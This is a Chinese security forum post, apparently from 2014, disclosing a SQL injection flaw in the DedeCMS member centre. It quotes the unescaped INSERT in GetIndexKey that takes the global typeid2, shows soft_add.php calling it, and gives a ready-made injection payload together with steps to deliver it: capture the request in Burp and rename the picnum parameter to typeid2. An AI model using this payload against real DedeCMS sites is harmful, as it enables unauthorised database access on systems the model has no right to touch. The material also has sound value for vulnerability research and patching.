查看: 10818|回复: 0

Dedecms 会员中心注入漏洞6

[复制链接]
  • TA的每日心情
    开心
    2017-1-9 18:10
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2014-2-28 03:02:44 | 显示全部楼层 |阅读模式
    [AppleScript] 纯文本查看 复制代码
    <pre><code>5',1,1,1,@`'`),('-1','7',user() , '3','1389688643', '1389688643', '8'),(1,2,'
     
    /include/helpers/archive.helper.php
    if ( ! function_exists('GetIndexKey'))
    {
        function GetIndexKey($arcrank, $typeid, $sortrank=0, $channelid=1, $senddate=0, $mid=1)
        {
            global $dsql,$senddate,$typeid2;//typeid2调用外部 结合dede的便利覆盖即可
            if(empty($typeid2)) $typeid2 = 0;
            if(empty($senddate)) $senddate = time();
            if(empty($sortrank)) $sortrank = $senddate;
            $iquery = "
              INSERT INTO `#@__arctiny` (`arcrank`,`typeid`,`typeid2`,`channel`,`senddate`, `sortrank`, `mid`)
              VALUES ('$arcrank','$typeid','$typeid2' , '$channelid','$senddate', '$sortrank', '$mid') ";
             echo    $iquery;
            $dsql-&gt;ExecuteNoneQuery($iquery);
            $aid = $dsql-&gt;GetLastID();
            return $aid;
        }
    }
     
    调用
    /member/soft_add.php
    else if($dopost=='save')
    {
        $description = '';
        include(DEDEMEMBER.'/inc/archives_check.php');
     
        //生成文档ID
        $arcID = GetIndexKey($arcrank,$typeid,$sortrank,$channelid,$senddate,$mid);//调用了~
        if(empty($arcID))</code></pre>

    调用的地方比较多 我就不一一写出了

    测试方法

    打开http://127.0.0.1/dede/member/soft_add.php

    添加软件

    然后打开BURP抓包

    讲picnum改成typeid2

    然后参数写5',1,1,1,@`'`),('-1','7',user() , '3','1389688643', '1389688643', '8'),(1,2,'

    就能看到注入结果了
    1111111111111111.jpg
    2222222222222.jpg
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-27 20:31 , Processed in 0.025411 second(s), 18 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部